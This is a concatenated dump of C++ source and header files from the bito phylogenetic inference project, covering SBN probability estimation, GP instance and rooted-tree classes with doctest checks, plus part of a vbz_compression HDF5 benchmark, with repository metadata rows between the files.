// Copyright 2019-2022 bito project contributors. // bito is free software under the GPLv3; see LICENSE file for details. // // BeagleAccessories are collections of artifacts that we can make in constant // time given the tree, and remain const througout any operation-gathering tree // traversal. #pragma once #include <numeric> #include <vector> #include "libhmsbeagle/beagle.h" #include "node.hpp" struct BeagleAccessories { const int beagle_instance_; const bool rescaling_; const int root_id_; const int fixed_node_id_; const int root_child_id_; const int node_count_; const int taxon_count_; const int internal_count_; // We're not exacty sure what this mysterious_count argument is for. // The beagle docs say: Number of partialsBuffer to integrate (input) // In the BEASTs it's hardcoded to 1 and in MrBayes it appears to be for // covarion models. const int mysterious_count_ = 1; // Scaling factors are recomputed every time so we don't read them // using destinationScaleRead. const int destinationScaleRead_ = BEAGLE_OP_NONE; // This is the entry of scaleBuffer in which we store accumulated factors. const std::vector<int> cumulative_scale_index_; const std::vector<int> node_indices_; // pattern weights const std::vector<int> category_weight_index_ = {0}; // state frequencies const std::vector<int> state_frequency_index_ = {0}; // indices of parent partialsBuffers std::vector<int> upper_partials_index_ = {0}; // indices of child partialsBuffers std::vector<int> node_partial_indices_ = {0}; // transition probability matrices std::vector<int> node_mat_indices_ = {0}; // first derivative matrices std::vector<int> node_deriv_index_ = {0}; BeagleAccessories(int beagle_instance, bool rescaling, const Node::NodePtr topology) : beagle_instance_(beagle_instance), rescaling_(rescaling), root_id_(static_cast<int>(topology->Id())), fixed_node_id_(static_cast<int>(topology->Children()[1]->Id())), root_child_id_(static_cast<int>(topology->Children()[0]->Id())), node_count_(static_cast<int>(topology->LeafCount() * 2 - 1)), taxon_count_(static_cast<int>(topology->LeafCount())), internal_count_(taxon_count_ - 1), cumulative_scale_index_({rescaling ? 0 : BEAGLE_OP_NONE}), node_indices_(IotaVector(node_count_ - 1, 0)) {} static std::vector<int> IotaVector(size_t size, int start_value) { std::vector<int> v(size); std::iota(v.begin(), v.end(), start_value); return v; } };
2,553
C++
.h
60
38.816667
86
0.709288
phylovi/bito
38
9
59
GPL-3.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,142
sbn_probability.hpp
phylovi_bito/src/sbn_probability.hpp
// Copyright 2019-2022 bito project contributors. // bito is free software under the GPLv3; see LICENSE file for details. // // Perform training of an SBN based on a sample of trees. // // We assume that readers are familiar with how the sbn_parameters_ vector is laid out: // first probabilities of rootsplits, then conditional probabilities of PCSPs. #pragma once #include "eigen_sugar.hpp" #include "sbn_maps.hpp" namespace SBNProbability { // The "SBN-SA" estimator described in the "Maximum Lower Bound Estimates" section of // the 2018 NeurIPS paper. void SimpleAverage( EigenVectorXdRef sbn_parameters, const UnrootedIndexerRepresentationCounter& indexer_representation_counter, size_t rootsplit_count, const BitsetSizePairMap& parent_to_range); void SimpleAverage( EigenVectorXdRef sbn_parameters, const RootedIndexerRepresentationCounter& indexer_representation_counter, size_t rootsplit_count, const BitsetSizePairMap& parent_to_range); // The "SBN-EM" estimator described in the "Expectation Maximization" section of // the 2018 NeurIPS paper. Returns the sequence of scores (defined in the paper) // obtained by the EM iterations. EigenVectorXd ExpectationMaximization( EigenVectorXdRef sbn_parameters, const UnrootedIndexerRepresentationCounter& indexer_representation_counter, size_t rootsplit_count, const BitsetSizePairMap& parent_to_range, double alpha, size_t max_iter, double score_epsilon); // Calculate the probability of an indexer_representation of a rooted topology. double ProbabilityOfSingle(EigenConstVectorXdRef sbn_parameters, const RootedIndexerRepresentation& indexer_representation); // Calculate the probability of an indexer_representation of an unrooted topology. double ProbabilityOfSingle(EigenConstVectorXdRef sbn_parameters, const UnrootedIndexerRepresentation& indexer_representation); // Calculate the probabilities of a collection of rooted indexer_representations. EigenVectorXd ProbabilityOfCollection( EigenConstVectorXdRef sbn_parameters, const std::vector<RootedIndexerRepresentation>& indexer_representations); // Calculate the probabilities of a collection of unrooted indexer_representations. EigenVectorXd ProbabilityOfCollection( EigenConstVectorXdRef sbn_parameters, const std::vector<UnrootedIndexerRepresentation>& indexer_representations); // This function performs in-place normalization of vec given by range when its values // are in log space. void ProbabilityNormalizeRangeInLog(EigenVectorXdRef vec, std::pair<size_t, size_t> range); // Perform in-place normalization of vec when its values are in log space. // We assume that vec is laid out like sbn_parameters (see top). void ProbabilityNormalizeParamsInLog(EigenVectorXdRef vec, size_t rootsplit_count, const BitsetSizePairMap& parent_to_range); bool IsInSBNSupport(const SizeVector& rooted_representation, size_t out_of_support_sentinel_value); // Take the sum of the entries of vec in indices plus starting_value. double SumOf(EigenConstVectorXdRef vec, const SizeVector& indices, double starting_value); } // namespace SBNProbability #ifdef DOCTEST_LIBRARY_INCLUDED // Here we hardcode in "ground truth" values from // https://github.com/zcrabbit/sbn. // See https://github.com/phylovi/bito/pull/167 for details on how this code was // run. EigenVectorXd ExpectedSAVector() { EigenVectorXd expected_SA(100); expected_SA << 0.1563122979972875, 0.1563122979972875, 0.1225902102462595, 0.003813409758997299, 0.06405479308023015, 0.1225902102462595, 0.006496265198833325, 0.07224488861161361, 0.07224488861161361, 0.09211800063278303, 0.050235906509724905, 0.07224488861161361, 0.1225902102462595, 0.004000036290989688, 0.000785970418989169, 0.015740902738698836, 0.0007369945657169131, 0.092118000632783, 0.050235906509724905, 0.15631229799728746, 0.004517219839302666, 0.1225902102462595, 0.020070904829444434, 0.07224488861161361, 0.00826101112145943, 0.1563122979972875, 0.050235906509724905, 0.092118000632783, 6.6925344669117846e-06, 0.012000108872969078, 0.00107615168209648, 0.00487602847011386, 0.00524108566424323, 0.1563122979972875, 0.006470871758283066, 0.050235906509724905, 0.0034098101830328945, 0.1563122979972875, 0.07224488861161361, 0.0036073007280301274, 0.009488612393535554, 0.005657493542553093, 0.007936324421697116, 0.1225902102462595, 0.1563122979972875, 0.0064788184404525545, 0.1563122979972875, 0.006493612301549656, 0.1225902102462595, 0.1225902102462595, 0.06405479308023015, 0.06405479308023015, 0.092118000632783, 0.006224174813063337, 0.006496265198833326, 0.15631229799728746, 0.002156957252761021, 0.008283255738394914, 0.012789795178479234, 0.1225902102462595, 0.0057598153715508514, 0.1225902102462595, 0.1563122979972875, 0.12259021024625949, 0.15631229799728746, 0.004505082963907347, 0.15631229799728746, 0.06405479308023015, 0.050235906509724905, 0.00016398394968572145, 0.1225902102462595, 0.15631229799728752, 0.050235906509724905, 0.1563122979972875, 0.003933969974285363, 0.09211800063278297, 0.07224488861161361, 0.1563122979972875, 0.12259021024625949, 0.012098733104319886, 0.00028556179453190954, 0.005744340855421819, 0.00299072194405209, 0.0031839409290006357, 0.092118000632783, 0.1225902102462595, 0.0015789121009827038, 0.1563122979972875, 0.1225902102462595, 0.009488612393535554, 0.008035213534600344, 0.008283255738394914, 0.1225902102462595, 0.1563122979972875, 0.012789795178479234, 0.00826101112145943, 0.15631229799728746, 0.1563122979972875, 0.015740902738698836, 0.0014116239862321806; return expected_SA; } // Expected EM vectors with alpha = 0. std::tuple<EigenVectorXd, EigenVectorXd> ExpectedEMVectorsAlpha0() { // 1 iteration of EM with alpha = 0. EigenVectorXd expected_EM_0_1(100); expected_EM_0_1 << 0.15636219370379975, 0.15636219370379975, 0.12263720847530954, 0.0038161261257420274, 0.0641198257552132, 0.12263720847530954, 0.006486659269203554, 0.07229291766902365, 0.07229291766902365, 0.09217334703350938, 0.05029011931468532, 0.07229291766902365, 0.12263720847530954, 0.004003916595779366, 0.0007856587472007348, 0.01573322403407416, 0.0007374660239687015, 0.09217334703350938, 0.05029011931468532, 0.15636219370379975, 0.004512401354352734, 0.12263720847530954, 0.02005981904435064, 0.07229291766902365, 0.008265715290818319, 0.15636219370379975, 0.05029011931468532, 0.09217334703350938, 6.696764561669613e-06, 0.0120117421642559, 0.0010771644269441463, 0.004896166585246872, 0.005249064166033721, 0.15636219370379975, 0.006473675486085066, 0.05029011931468532, 0.0032873955583662736, 0.15636219370379975, 0.07229291766902365, 0.0036100017361450775, 0.009434696399838294, 0.0056590388012875215, 0.007977630170932788, 0.12263720847530954, 0.15636219370379975, 0.006482919565829875, 0.15636219370379975, 0.006552518113293269, 0.12263720847530954, 0.12263720847530954, 0.0641198257552132, 0.0641198257552132, 0.09217334703350938, 0.0062569566301722964, 0.006486659269203554, 0.15636219370379975, 0.002157895979240378, 0.008270476015894701, 0.012800407342249945, 0.12263720847530954, 0.0057533024269482485, 0.12263720847530954, 0.15636219370379975, 0.12263720847530954, 0.15636219370379975, 0.004509802427487057, 0.15636219370379975, 0.0641198257552132, 0.05029011931468532, 0.00016356223078203, 0.12263720847530954, 0.15636219370379975, 0.05029011931468532, 0.15636219370379975, 0.0039366703105347105, 0.09217334703350938, 0.07229291766902365, 0.15636219370379975, 0.12263720847530954, 0.01202920464244238, 0.00028206667942050513, 0.005749993943460951, 0.0029930413584166584, 0.00329320520591652, 0.09217334703350938, 0.12263720847530954, 0.0015794165564839767, 0.15636219370379975, 0.12263720847530954, 0.009434696399838294, 0.0080145373179354, 0.008270476015894701, 0.12263720847530954, 0.15636219370379975, 0.012800407342249945, 0.008265715290818319, 0.15636219370379975, 0.15636219370379975, 0.01573322403407416, 0.0014108855861473272; // 23 iterations of EM with alpha = 0. EigenVectorXd expected_EM_0_23(100); expected_EM_0_23 << 0.17652149361215352, 0.17652149361215352, 0.13955673648946823, 0.0064491608851600735, 0.05848390318274005, 0.13955673648946823, 0.015825262650921094, 0.056647494412346275, 0.056647494412346275, 0.07263326598713499, 0.046048205076811774, 0.056647494412346275, 0.13955673648946823, 0.004489402988562556, 0.0008454696589522312, 0.01696511452269485, 0.0007597630896160637, 0.07263326598713499, 0.046048205076811774, 0.17652149361215352, 0.007245923330084535, 0.13955673648946823, 0.021613944434184986, 0.056647494412346275, 0.014714698661351094, 0.17652149361215352, 0.046048205076811774, 0.07263326598713499, 9.203216973858281e-06, 0.012351059173222767, 0.0009871200936099765, 0.004930024591016917, 0.00491121394019874, 0.17652149361215352, 0.003698082517142961, 0.046048205076811774, 0.005102502844331727, 0.17652149361215352, 0.056647494412346275, 0.002888359861489329, 0.010768901737247942, 0.004400293712986419, 0.009082480764670433, 0.13955673648946823, 0.17652149361215352, 0.011355455748479546, 0.1765214936121535, 0.004904756855047689, 0.13955673648946823, 0.13955673648946823, 0.05848390318274005, 0.05848390318274005, 0.07263326598713499, 0.0071809191341133454, 0.015825262650921094, 0.17652149361215352, 0.002748656816901356, 0.020534769315758854, 0.015225481783759537, 0.13955673648946823, 0.009401422446411185, 0.13955673648946823, 0.17652149361215352, 0.13955673648946823, 0.17652149361215352, 0.005835611123722098, 0.17652149361215352, 0.05848390318274005, 0.046048205076811774, 0.00021701159553434837, 0.13955673648946823, 0.17652149361215352, 0.046048205076811774, 0.17652149361215352, 0.003632704913367913, 0.07263326598713499, 0.056647494412346275, 0.17652149361215352, 0.13955673648946823, 0.013620606755282007, 0.0013952624329697414, 0.007542542618796534, 0.004980505041486884, 0.0049091058169283925, 0.07263326598713499, 0.13955673648946823, 0.0018467480153313562, 0.17652149361215352, 0.13955673648946823, 0.010768901737247942, 0.00801061474692208, 0.020534769315758854, 0.13955673648946823, 0.17652149361215352, 0.015225481783759537, 0.014714698661351094, 0.1765214936121535, 0.17652149361215352, 0.01696511452269485, 0.0010195073633053277; return {expected_EM_0_1, expected_EM_0_23}; } // Expected EM vector with alpha = 0.5 EigenVectorXd ExpectedEMVectorAlpha05() { // 100 iterations of EM with alpha = 0.5, from Andy's Rev implementation. EigenVectorXd expected_EM_05_100(100); expected_EM_05_100 << 0.156334, 0.156334, 0.1226123, 0.003816548, 0.06410458, 0.1226123, 0.006490481, 0.07228169, 0.07228169, 0.09216116, 0.05027706, 0.07228169, 0.1226123, 0.00400394, 0.0007856247, 0.01573095, 0.0007376477, 0.09216116, 0.05027706, 0.156334, 0.004514539, 0.1226123, 0.02005742, 0.07228169, 0.008265798, 0.156334, 0.05027706, 0.09216116, 6.695972e-06, 0.01201178, 0.001077308, 0.004899056, 0.005247481, 0.156334, 0.006473987, 0.05027706, 0.003445344, 0.156334, 0.07228169, 0.0036098, 0.009448465, 0.005659673, 0.007976663, 0.1226123, 0.156334, 0.006482844, 0.156334, 0.006417704, 0.1226123, 0.1226123, 0.06410458, 0.06410458, 0.09216116, 0.006256103, 0.006490481, 0.156334, 0.002157991, 0.008275552, 0.01279726, 0.1226123, 0.005756163, 0.1226123, 0.156334, 0.1226123, 0.156334, 0.004509251, 0.156334, 0.06410458, 0.05027706, 0.0001636864, 0.1226123, 0.156334, 0.05027706, 0.156334, 0.003936684, 0.09216116, 0.07228169, 0.156334, 0.1226123, 0.01204707, 0.0002831188, 0.005749409, 0.002993311, 0.003384393, 0.09216116, 0.1226123, 0.001579132, 0.156334, 0.1226123, 0.009448465, 0.008020635, 0.008275552, 0.1226123, 0.156334, 0.01279726, 0.008265798, 0.156334, 0.156334, 0.01573095, 0.001410898; return expected_EM_05_100; } #endif // DOCTEST_LIBRARY_INCLUDED
12,548
C++
.h
196
58.214286
88
0.779922
phylovi/bito
38
9
59
GPL-3.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,143
gp_instance.hpp
phylovi_bito/src/gp_instance.hpp
// Copyright 2019-2022 bito project contributors. // bito is free software under the GPLv3; see LICENSE file for details. #pragma once #include "gp_dag.hpp" #include "gp_engine.hpp" #include "rooted_tree_collection.hpp" #include "site_pattern.hpp" #include "nni_engine.hpp" #include "fat_beagle.hpp" #include "phylo_model.hpp" // New typedef used for storing/outputting intermediate or perturbed+tracked values // from branch length estimation. using VectorOfStringAndEigenVectorXdPairs = std::vector<std::pair<std::string, EigenVectorXd>>; class GPInstance { public: explicit GPInstance(const std::string &mmap_file_path) : mmap_file_path_(mmap_file_path) { if (mmap_file_path.empty()) { Failwith("GPInstance needs a legal path as a constructor argument."); } }; // ** I/O void ReadFastaFile(const std::string &fname); void ReadNewickFile(const std::string &fname, const bool sort_taxa = true); void ReadNewickFileGZ(const std::string &fname, const bool sort_taxa = true); void ReadNexusFile(const std::string &fname, const bool sort_taxa = true); void ReadNexusFileGZ(const std::string &fname, const bool sort_taxa = true); std::string GetFastaSourcePath() const; std::string GetNewickSourcePath() const; std::string GetNexusSourcePath() const; std::string GetMMapFilePath() const; void PrintStatus(); StringSizeMap DAGSummaryStatistics(); // ** Access const TagStringMap &GetTaxonMap() const; GPDAG &GetDAG(); const GPDAG &GetDAG() const; GPEngine &GetGPEngine(); const GPEngine &GetGPEngine() const; TPEngine &GetTPEngine(); const TPEngine &GetTPEngine() const; NNIEngine &GetNNIEngine(); const NNIEngine &GetNNIEngine() const; // ** Taxon Map // Get taxon names. StringVector GetTaxonNames() const; // ** DAG void MakeDAG(); bool HasDAG() const; void PrintDAG(); SitePattern MakeSitePattern() const; // Export the subsplit DAG as a DOT file. void SubsplitDAGToDot(const std::string &out_path, bool show_index_labels = true) const; // ** GP Engine void MakeGPEngine(double rescaling_threshold = GPEngine::default_rescaling_threshold_, bool use_gradients = false); bool HasGPEngine() const; void PopulatePLVs(); void ComputeLikelihoods(); void ComputeMarginalLikelihood(); void CalculateHybridMarginals(); void ResizeEngineForDAG(); void ReinitializePriors(); void ProcessOperations(const GPOperationVector &operations); void HotStartBranchLengths(); SizeDoubleVectorMap GatherBranchLengths(); void TakeFirstBranchLength(); void EstimateSBNParameters(); void SetOptimizationMethod(const OptimizationMethod method); void UseGradientOptimization(const bool use_gradients); // Estimate branch lengths using GPEngine. For testing purposes. void EstimateBranchLengths(double tol, size_t max_iter, bool quiet = false, bool track_intermediate_iterations = false, std::optional<OptimizationMethod> method = std::nullopt); // This scans the PCSP likelihood surface by calculating the per pcsp likelihood // values at different branch length values. The currently set branch lengths are // scaled by a vector of size "steps" that ranges linearly from "scale_min" to // "scale_max". void GetPerGPCSPLogLikelihoodSurfaces(size_t steps, double scale_min, double scale_max); // This is for tracking branch length optimization following perturbation of a single // branch length, when assuming all other branch lengths are optimal. We perturb // branch lengths for each pcsp to the default value of 0.1 and then track branch // length and per pcsp likelihood values until the likelihood converges to the optimal // value or the number of DAG traversals exceeds 5. void PerturbAndTrackValuesFromOptimization(); RootedTreeCollection GenerateCompleteRootedTreeCollection(); RootedTreeCollection GenerateCoveringRootedTreeCollection(); void PrintEdgeIndexer(); // #348: A lot of code duplication here with things in SBNInstance. StringVector PrettyIndexer() const; EigenConstVectorXdRef GetSBNParameters(); StringDoubleVector PrettyIndexedSBNParameters(); StringDoubleVector PrettyIndexedBranchLengths(); StringDoubleVector PrettyIndexedPerGPCSPLogLikelihoods(); StringDoubleVector PrettyIndexedPerGPCSPComponentsOfFullLogMarginal(); VectorOfStringAndEigenVectorXdPairs PrettyIndexedIntermediateBranchLengths(); VectorOfStringAndEigenVectorXdPairs PrettyIndexedIntermediatePerGPCSPLogLikelihoods(); VectorOfStringAndEigenVectorXdPairs PrettyIndexedPerGPCSPLogLikelihoodSurfaces(); void SBNParametersToCSV(const std::string &file_path); void SBNPriorToCSV(const std::string &file_path); void BranchLengthsToCSV(const std::string &file_path); void PerGPCSPLogLikelihoodsToCSV(const std::string &file_path); void IntermediateBranchLengthsToCSV(const std::string &file_path); void IntermediatePerGPCSPLogLikelihoodsToCSV(const std::string &file_path); void PerGPCSPLogLikelihoodSurfacesToCSV(const std::string &file_path); void TrackedOptimizationValuesToCSV(const std::string &file_path); // Get branch lengths. EigenVectorXd GetBranchLengths() const; // Get per PCSP log likelihoods EigenVectorXd GetPerPCSPLogLikelihoods() const; // ** Trees // Get a reference to collection of currently loaded trees. const RootedTreeCollection &GetCurrentlyLoadedTrees() const { return tree_collection_; }; // Generate a version of the topologies in the current tree collection that use // the current GP branch lengths. RootedTreeCollection CurrentlyLoadedTreesWithGPBranchLengths(); // Subset the currently loaded topologies to those that have a given PCSP, and equip // them with current GP branch lengths. RootedTreeCollection CurrentlyLoadedTreesWithAPCSPStringAndGPBranchLengths( const std::string &pcsp_string); // Generate all trees spanned by the DAG and load them into the instance. void LoadAllGeneratedTrees(); // Run CurrentlyLoadedTreesWithGPBranchLengths and export to a Newick file. void ExportTrees(const std::string &out_path); // Run CurrentlyLoadedTreesWithAPCSPStringAndGPBranchLengths and export to a Newick // file. void ExportTreesWithAPCSP(const std::string &pcsp_string, const std::string &newick_path); // Export all topologies in the span of the subsplit DAG to a Newick file. Does not // require an Engine. void ExportAllGeneratedTopologies(const std::string &out_path); // Export all trees in the span of the subsplit DAG (with GP branch lengths) to a // Newick file. Requires an Engine. void ExportAllGeneratedTrees(const std::string &out_path); // Export spanning set of trees with GP branch lengths. void ExportCoveringTreesWithGPBranchLengths(const std::string &out_path) const; // Export spanning set of trees with TP branch lengths. void ExportTopTreesWithTPBranchLengths(const std::string &out_path) const; // ** TP Engine void MakeTPEngine(); void TPEngineSetChoiceMapByTakingFirst(const bool use_subsplit_method = true); void TPEngineSetBranchLengthsByTakingFirst(); // Estimate branch lengths using TPEngine. For testing purposes. void TPEngineEstimateBranchLengths( double tol, size_t max_iter, bool quiet = false, bool track_intermediate_iterations = false, std::optional<OptimizationMethod> method = std::nullopt); std::vector<RootedTree> TPEngineGenerateCoveringTrees(); TreeIdTreeMap TPEngineGenerateTopRootedTrees(); void TPEngineExportCoveringTrees(const std::string &out_path); void TPEngineExportTopTrees(const std::string &out_path); // ** NNI Evaluation Engine void MakeNNIEngine(); // ** Tree Engines void MakeLikelihoodTreeEngine(); FatBeagle &GetLikelihoodTreeEngine(); void MakeParsimonyTreeEngine(); SankoffHandler &GetParsimonyTreeEngine(); private: void ClearTreeCollectionAssociatedState(); void CheckSequencesLoaded() const; void CheckTreesLoaded() const; // Calculate and store the intermediate per pcsp branch length and likelihood values // during branch length estimation, so that they can be output to CSV. void IntermediateOptimizationValues(); EdgeId GetEdgeIndexForLeafNode(const Bitset &parent_subsplit, const Node *leaf_node) const; RootedTreeCollection TreesWithGPBranchLengthsOfTopologies( Node::NodePtrVec &&topologies) const; StringDoubleVector PrettyIndexedVector(EigenConstVectorXdRef v); VectorOfStringAndEigenVectorXdPairs PrettyIndexedMatrix(EigenConstMatrixXdRef m); void PerPCSPIndexedMatrixToCSV( VectorOfStringAndEigenVectorXdPairs per_pcsp_indexed_matrix, const std::string &file_path); // ** Data std::optional<std::string> fasta_path_ = std::nullopt; std::optional<std::string> newick_path_ = std::nullopt; std::optional<std::string> nexus_path_ = std::nullopt; RootedTreeCollection tree_collection_; Alignment alignment_; std::unique_ptr<GPDAG> dag_ = nullptr; // Root filepath for storing mmapped data. std::optional<std::string> mmap_file_path_ = std::nullopt; // ** Engines std::unique_ptr<GPEngine> gp_engine_ = nullptr; std::unique_ptr<TPEngine> tp_engine_ = nullptr; std::unique_ptr<NNIEngine> nni_engine_ = nullptr; std::unique_ptr<FatBeagle> likelihood_tree_engine_ = nullptr; std::unique_ptr<SankoffHandler> parsimony_tree_engine_ = nullptr; // ** Branch Length Optimization size_t gpcsp_count_ = 0; // For storing intermediate optimization branch length and per pcsp log // likelihood values. Only used if track_intermediate_iterations in // EstimateBranchLengths is true. EigenMatrixXd per_pcsp_branch_lengths_ = EigenMatrixXd(gpcsp_count_, 1); EigenMatrixXd per_pcsp_log_lik_ = EigenMatrixXd(gpcsp_count_, 1); // For storing branch length and log likelihood values when finding the log likelihood // surface for each pcsp EigenMatrixXd per_pcsp_lik_surfaces_; // For storing outputs after perturbing and then tracking branch length and per pcsp // log likelihoods VectorOfStringAndEigenVectorXdPairs tracked_values_after_perturbing_; };
10,280
C++
.h
208
45.173077
88
0.770498
phylovi/bito
38
9
59
GPL-3.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,144
rooted_tree.hpp
phylovi_bito/src/rooted_tree.hpp
// Copyright 2019-2022 bito project contributors. // bito is free software under the GPLv3; see LICENSE file for details. // // This is a rooted tree class that had the extra parameters required to do node height // gradients. In fact, because RootedTree also has branch lengths (inherited from Tree) // all of the extra state in this object is redundant other than the tip dates. // // Rooted trees can exist in 3 states: // 1. No dates associated // 2. Dates associated, which also initializes node_bounds_ // 3. As an initialized time tree, which means that all members are initialized. // // State 3 means that the branch lengths must be compatible with tip dates. // // In the terminology here, imagine that the tree is rooted at the top and hangs down. // The "height" of a node is how far we have to go back in time to that divergence event // from the present. // // The most important parameterization here is in terms of node height ratios, which are // of the form n/d, where // // n = time difference between this node's height and that of its earliest descendant E // d = time difference between the parent's height and that of E. #pragma once #include "eigen_sugar.hpp" #include "tree.hpp" class RootedTree : public Tree { public: using RootedTreeVector = std::vector<RootedTree>; RootedTree(const Node::NodePtr& topology, BranchLengthVector branch_lengths); explicit RootedTree(const Node::NodePtr& topology, BranchLengthVector branch_lengths, std::vector<double> node_bounds, std::vector<double> height_ratios, std::vector<double> node_heights, std::vector<double> rates, size_t rate_count); explicit RootedTree(const Tree& tree); RootedTree DeepCopy() const; const std::vector<double>& GetNodeBounds() const { EnsureTipDatesHaveBeenSet(); return node_bounds_; } const std::vector<double>& GetHeightRatios() const { EnsureTimeTreeHasBeenInitialized(); return height_ratios_; } const std::vector<double>& GetNodeHeights() const { EnsureTimeTreeHasBeenInitialized(); return node_heights_; } const std::vector<double>& GetRates() const { EnsureTimeTreeHasBeenInitialized(); return rates_; } size_t RateCount() const { return rate_count_; } inline bool TipDatesHaveBeenSet() const { return !node_bounds_.empty(); } inline void EnsureTipDatesHaveBeenSet() const { if (!TipDatesHaveBeenSet()) { Failwith( "Attempted access of a time tree member that requires the tip dates to be " "set. Have you set dates for your time trees?"); } } // Set the tip dates in the tree, and also set the node bounds. Note that these dates // are the amount of time elapsed between the sampling date and the present. Thus, // older times have larger dates. This function requires the supplied branch lengths // to be clocklike. void SetTipDates(const TagDoubleMap& tag_date_map); inline bool TimeTreeHasBeenInitialized() const { return !height_ratios_.empty(); } inline void EnsureTimeTreeHasBeenInitialized() const { if (!TimeTreeHasBeenInitialized()) { Failwith( "Attempted access of a time tree member that requires the time tree to be " "initialized. Have you set dates for your time trees, and initialized the " "time trees?"); } } // Use the branch lengths to set node heights and height ratios. void InitializeTimeTreeUsingBranchLengths(); // Set node_heights_ so that they have the given height ratios. // This should become SetNodeHeights during #205, and actually set height ratios as // well. void InitializeTimeTreeUsingHeightRatios(EigenConstVectorXdRef height_ratios); TagDoubleMap TagDateMapOfDateVector(std::vector<double> leaf_date_vector); // The lower bound for the height of each node, which is the maximum of the tip dates // across all of the descendants of the node. See top of this file to read about how // this vector can be initialized even if the rest of the fields below are not. std::vector<double> node_bounds_; // This vector is of length equal to the number of internal nodes, and (except for the // last entry) has the node height ratios. The last entry is the root height. // The indexing is set up so that the ith entry has the node height ratio for the // (i+leaf_count)th node for all i except for the last. std::vector<double> height_ratios_; // The actual node heights for all nodes. std::vector<double> node_heights_; // The per-branch substitution rates. std::vector<double> rates_; // Number of substitution rates (e.g. 1 rate for strict clock) size_t rate_count_ = 0; bool operator==(const Tree& other) const = delete; bool operator==(const RootedTree& other) const; // The tree `(0:2,(1:1.5,(2:2,3:1):2.5):2.5):0;` as depicted in // https://github.com/phylovi/bito/issues/187#issuecomment-618421183 static RootedTree Example(); static RootedTree UnitBranchLengthTreeOf(Node::NodePtr topology); private: // As for SetTipDates, but only set the node bounds. No constraint on supplied // branch lengths. void SetNodeBoundsUsingDates(const TagDoubleMap& tag_date_map); void AssertTopologyBifurcatingInConstructor(const Node::NodePtr& topology); }; inline bool operator!=(const RootedTree& lhs, const RootedTree& rhs) { return !(lhs == rhs); } #ifdef DOCTEST_LIBRARY_INCLUDED TEST_CASE("RootedTree") { // To understand this test, please see // https://github.com/phylovi/bito/issues/187#issuecomment-618421183 auto tree = RootedTree::Example(); std::vector<double> correct_height_ratios({1. / 3.5, 1.5 / 4., 7.}); for (size_t i = 0; i < correct_height_ratios.size(); ++i) { CHECK_EQ(correct_height_ratios[i], tree.height_ratios_[i]); } std::vector<double> correct_node_heights({5., 3., 0., 1., 2., 4.5, 7.}); std::vector<double> correct_node_bounds({5., 3., 0., 1., 1., 3., 5.}); std::vector<double> correct_branch_lengths({2., 1.5, 2., 1., 2.5, 2.5}); for (size_t i = 0; i < correct_node_heights.size(); ++i) { CHECK_EQ(correct_node_heights[i], tree.node_heights_[i]); CHECK_EQ(correct_node_bounds[i], tree.node_bounds_[i]); } for (size_t i = 0; i < correct_branch_lengths.size(); ++i) { CHECK_EQ(correct_branch_lengths[i], tree.branch_lengths_[i]); } // Test ratios to heights. const double arbitrary_dummy_number = -5.; std::fill(tree.LeafCount() + tree.node_heights_.begin(), // First internal node. tree.node_heights_.end(), arbitrary_dummy_number); EigenVectorXd new_height_ratios(3); // Issue #205: eliminate this code duplication. // Root height is multiplied by 2. new_height_ratios << 1. / 3.5, 1.5 / 4., 14.; std::vector<double> new_correct_node_heights({5., 3., 0., 1., 2.75, 7.125, 14.}); std::vector<double> new_correct_branch_lengths({9., 4.125, 2.75, 1.75, 4.375, 6.875}); tree.InitializeTimeTreeUsingHeightRatios(new_height_ratios); for (size_t i = 0; i < correct_node_heights.size(); ++i) { CHECK_EQ(new_correct_node_heights[i], tree.node_heights_[i]); } for (size_t i = 0; i < correct_branch_lengths.size(); ++i) { CHECK_EQ(new_correct_branch_lengths[i], tree.branch_lengths_[i]); } } #endif // DOCTEST_LIBRARY_INCLUDED
7,296
C++
.h
151
44.509934
88
0.712361
phylovi/bito
38
9
59
GPL-3.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,146
vbz_hdf_perf.cpp
nanoporetech_vbz_compression/vbz_plugin/perf/vbz_hdf_perf.cpp
#include "../test/test_utils.h" #include "../../vbz/perf/test_data_generator.h" #include "hdf_id_helper.h" #include "vbz_plugin.h" #include "vbz_plugin_user_utils.h" #include <hdf5.h> #include <array> #include <benchmark/benchmark.h> static bool plugin_init_result = vbz_register(); template <typename IntType> hid_t get_h5_type() { hid_t type = 0; if (std::is_same<IntType, std::int8_t>::value) { type = H5T_NATIVE_UINT8; } else if (std::is_same<IntType, std::uint8_t>::value) { type = H5T_NATIVE_INT8; } else if (std::is_same<IntType, std::int16_t>::value) { type = H5T_NATIVE_UINT16; } else if (std::is_same<IntType, std::uint16_t>::value) { type = H5T_NATIVE_INT16; } else if (std::is_same<IntType, std::int32_t>::value) { type = H5T_NATIVE_UINT32; } else if (std::is_same<IntType, std::uint32_t>::value) { type = H5T_NATIVE_INT32; } else { std::abort(); } return type; } template <bool UseZigZag, std::size_t ZstdLevel> void vbz_filter(hid_t creation_properties, int int_size) { vbz_filter_enable(creation_properties, int_size, UseZigZag, ZstdLevel); } void zlib_filter(hid_t creation_properties, int) { H5Pset_deflate(creation_properties, 1); } void no_filter(hid_t creation_properties, int) { } using FilterSetupFn = decltype(no_filter)*; template <typename Generator> void vbz_hdf_benchmark(benchmark::State& state, int integer_size, hid_t h5_type, FilterSetupFn setup_filter) { (void)plugin_init_result; std::size_t max_element_count = 0; auto input_value_list = Generator::generate(max_element_count); std::size_t item_count = 0; for (auto _ : state) { std::size_t id = 0; state.PauseTiming(); auto file_id = H5Fcreate("./test_file.h5", H5F_ACC_TRUNC, H5P_DEFAULT, H5P_DEFAULT); auto file = IdRef::claim(file_id); state.ResumeTiming(); item_count = 0; for (auto const& input_values : input_value_list) { auto creation_properties = IdRef::claim(H5Pcreate(H5P_DATASET_CREATE)); std::array<hsize_t, 1> chunk_sizes{ { input_values.size() } }; H5Pset_chunk(creation_properties.get(), int(chunk_sizes.size()), chunk_sizes.data()); setup_filter(creation_properties.get(), integer_size); std::string dset_name = std::to_string(id++); auto dataset = create_dataset(file_id, dset_name.c_str(), h5_type, input_values.size(), creation_properties.get()); auto val = write_full_dataset(dataset.get(), h5_type, input_values); item_count += input_values.size(); benchmark::DoNotOptimize(val); } } state.SetItemsProcessed(state.iterations() * item_count); 